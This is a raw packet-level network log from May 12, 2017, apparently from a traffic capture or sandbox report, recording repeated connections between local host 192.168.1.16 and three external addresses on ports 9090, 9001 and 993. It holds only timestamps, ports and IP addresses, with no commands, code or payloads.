May 12, 2017 18:55:03.994338036 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.994362116 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.994460106 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.994479895 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.996859074 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.996891022 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.996985912 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.997003078 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.997014046 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.997071028 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.997092009 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.000590086 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:04.001455069 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.003721952 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.003745079 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.003853083 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:04.003879070 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.117835999 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.118035078 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:04.118066072 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.152447939 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:04.152513981 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:04.340449095 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:04.340512991 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:04.584455013 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:04.584611893 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:06.316457987 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:06.316530943 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:07.252445936 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:07.252562046 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:09.307487011 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:09.307518005 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.307532072 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.307539940 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.307545900 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.307553053 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.307559967 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308046103 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.308067083 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.308075905 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.308083057 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.308387995 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:09.308402061 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308408976 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308413982 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308419943 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308936119 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:09.308976889 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308984995 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308989048 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.308994055 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309000015 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309005022 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309010029 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309015989 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309020996 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309026003 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309031010 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309031010 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.309036970 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309051037 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309056044 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.309062004 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.310343027 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.310360909 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310895920 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.310915947 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310925007 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310930967 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310936928 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310941935 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310949087 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310955048 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.310960054 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312609911 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:09.312865019 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.312889099 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312901020 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312907934 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312913895 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312918901 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312925100 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312931061 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.312936068 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316600084 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.316642046 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316728115 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316734076 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316739082 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316744089 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316749096 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316754103 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.316759109 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320614100 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.320652008 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320664883 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320671082 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320677042 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320682049 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320687056 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320692062 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.320697069 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324595928 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.324645996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324661016 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324667931 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324675083 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324681044 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324686050 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324692011 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.324697971 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.328634977 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.328687906 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.328702927 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.332611084 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.524463892 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:09.524647951 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:09.548464060 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.744247913 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:09.980467081 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:09.980600119 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:10.460453987 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:10.460633993 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:11.420500994 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:11.420676947 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:13.344468117 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:13.348615885 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:16.447396040 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:16.447422028 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:17.200460911 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.200676918 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.746613026 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:17.746632099 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:17.747288942 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.747306108 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:17.747927904 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.750457048 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:17.750471115 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:17.751125097 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.751138926 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:17.751641035 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.751835108 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.751847029 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:17.752192020 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.753045082 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:17.753070116 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:17.753295898 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.753315926 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.753324986 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.753331900 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.753380060 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.753912926 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:17.753937006 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:17.754164934 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.754179001 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754188061 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754194021 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754201889 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754210949 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754228115 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754235029 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754240990 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754296064 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.754322052 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754331112 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754337072 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754344940 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754357100 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754364014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754370928 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754414082 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754439116 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754503965 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.754519939 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754528046 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754534006 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754542112 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754548073 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754555941 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754561901 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754570007 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754575968 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754782915 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.754795074 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:17.754868031 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.754883051 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754890919 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754897118 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754904985 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754910946 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754930019 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754937887 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754955053 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754961967 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.754967928 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.755831003 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.755908012 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.755922079 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.755930901 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.755939007 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.755945921 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.755951881 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.755959988 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.755968094 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.756520033 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.756875992 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:17.756974936 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.757224083 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:17.757448912 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.757462025 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:17.757900953 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:17.757922888 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:17.759335041 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:17.759349108 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:17.759948969 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:17.759962082 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:17.800456047 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.800543070 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:17.800556898 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:17.988446951 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:18.216459036 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:18.216757059 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:18.672454119 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:18.672594070 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:20.106338024 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:20.106363058 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:20.110799074 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:20.110821962 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.110837936 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.110846996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111411095 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:20.111429930 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111443996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111450911 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111455917 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111462116 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111469030 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111474991 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111480951 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111613035 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:20.111633062 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111644030 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111650944 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111658096 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111668110 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111674070 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111677885 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111681938 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111686945 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111690998 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111857891 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:20.111871958 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.111999989 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:20.112014055 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:55:20.112099886 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:20.112121105 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112132072 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112138033 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112143993 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112149954 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112154961 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112160921 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112166882 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112171888 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112178087 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112776995 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:20.112802982 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112818003 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112823963 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112828970 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112833977 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112839937 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112845898 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112850904 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112855911 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.112862110 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.116575956 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:20.116600990 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.116612911 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.116619110 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.116624117 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.118001938 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:20.340483904 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.555654049 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:20.828460932 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:20.828836918 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:21.380450964 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:21.380521059 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:22.488455057 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:22.488543987 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:24.700455904 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:24.700577021 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:25.006849051 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:25.044447899 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:29.124465942 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:29.124541044 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.417339087 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.417366982 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.417804956 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.417841911 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.417850971 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.417855978 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.417861938 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.417917013 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.417928934 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.417934895 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.417953014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.417967081 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.417973042 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418080091 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.418096066 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418103933 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418109894 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418116093 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418121099 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418128014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418195009 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418222904 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418240070 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418256044 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418268919 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418277979 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.418298006 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418311119 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418322086 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418334961 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418355942 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418365002 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418376923 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418378115 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.418410063 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418423891 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418437004 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418453932 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418467999 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418471098 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.418481112 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418497086 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418510914 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418524027 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418540001 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418549061 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.418554068 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418561935 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418577909 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418591976 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418605089 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418621063 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418633938 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418642044 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.418644905 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418658972 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418673992 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418687105 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418703079 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418715954 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418725014 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.418729067 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418740034 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418754101 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418767929 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418780088 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418792963 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418806076 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418814898 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.418822050 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418834925 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418845892 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418869972 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418883085 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418896914 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418900013 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.418914080 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418926954 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418937922 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418951035 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418963909 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418977976 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.418984890 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:30.418992043 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419006109 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419017076 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419032097 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:30.419045925 CEST90014919879.137.85.71192.168.1.16
